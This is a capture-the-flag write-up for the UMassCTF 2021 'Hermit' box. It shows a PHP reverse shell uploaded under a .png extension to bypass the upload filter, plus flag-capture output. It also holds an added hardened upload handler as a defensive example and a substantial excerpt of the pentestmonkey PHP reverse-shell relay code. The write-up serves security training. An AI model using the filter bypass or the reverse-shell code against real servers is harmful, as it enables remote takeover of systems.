Honestly? Go view the GitHub URL instead of looking here.

## Hermit - Part 1 (HP1)

### Description - HP1

Author: [goproslowyo](https://github.com/goproslowyo)

This box was a simple extension filter bypass to gain a shell and get the flag.

### Process - HP1

1. Started a `netcat` listener on `8001`.
1. Uploaded a PHP reverse shell with an image extension; `.png` worked fine.
1. We're given a random filename `0YE8gg` and a link (`http://34.121.84.161:8086/show.php?filename=0YE8gg`) to view it.
1. Viewing the link executes the reverse shell to give us access.
1. From here we can explore the server and get the flag.

```shell
[email protected]:/$ ls /home/hermit
ls /home/hermit
userflag.txt
[email protected]:/$ cat /home/hermit/userflag.txt
cat /home/hermit/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}
```
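
The steps above succeed only because the upload filter trusts the file extension and viewing the file runs it. The following added example (not code from the challenge or from the original writeup) shows one way to close both gaps, assuming `show.php` hands the stored file to the PHP interpreter, for example through `include`; the function names, the `UPLOAD_DIR` path and the ID format are hypothetical.

```php
<?php
// Added example: hypothetical hardened upload check and show.php handler.
// UPLOAD_DIR, the function names and the 16-hex-character ID are assumptions.

const UPLOAD_DIR = '/var/www/uploads';   // assumed; keep it out of any PHP-executing path

// Accept an upload only if its content is a PNG, whatever name the client sent.
function accept_png_upload(string $tmpPath): ?string
{
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($tmpPath) !== 'image/png') {
        return null;                     // a script renamed to .png is not image/png
    }
    // Re-encode through GD: trailing data and ancillary chunks are not copied.
    // This reduces, but does not remove, the room for embedded payloads.
    $img = @imagecreatefrompng($tmpPath);
    if ($img === false) {
        return null;
    }
    $id = bin2hex(random_bytes(8));      // server-chosen name, no extension
    return imagepng($img, UPLOAD_DIR . '/' . $id) ? $id : null;
}

// show.php: stream the bytes. Never include/require an uploaded file.
function show_upload(string $id): void
{
    if (!preg_match('/\A[0-9a-f]{16}\z/', $id)) {   // rejects path traversal
        http_response_code(400);
        return;
    }
    $path = UPLOAD_DIR . '/' . $id;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: image/png');
    header('X-Content-Type-Options: nosniff');
    header('Content-Length: ' . filesize($path));
    readfile($path);                     // bytes out, no interpretation as PHP
}
```

The `readfile()` call is the control that matters: even a file that slips past the content check is only ever sent to the browser as image bytes.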

### Screen Grabs - HP1

#### User Shell - HP1

![user shell](./assets/HP1/shell.png)

#### User Flag - HP1

![userflag.txt](./assets/HP1/flag.png)

#### Root LUL - HP1

![{a_test_of_integrity}](./assets/HP1/rootlol.png)

#### Proof - HP1

![proof](./assets/HP1/proof.png)

### Tools Used - HP1

1. [Pentest Monkey PHP Revshell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php)

```php
// Excerpt: the start of the script (connection setup) is not reproduced on this page.
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w")  // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}
// Non-blocking I/O on the child's pipes and on the socket
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
// Relay loop: socket -> child stdin, child stdout/stderr -> socket
while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
?>
```

Original writeup (https://infosecstreams.github.io/umassctf2021/#hermit---part-1-hp1).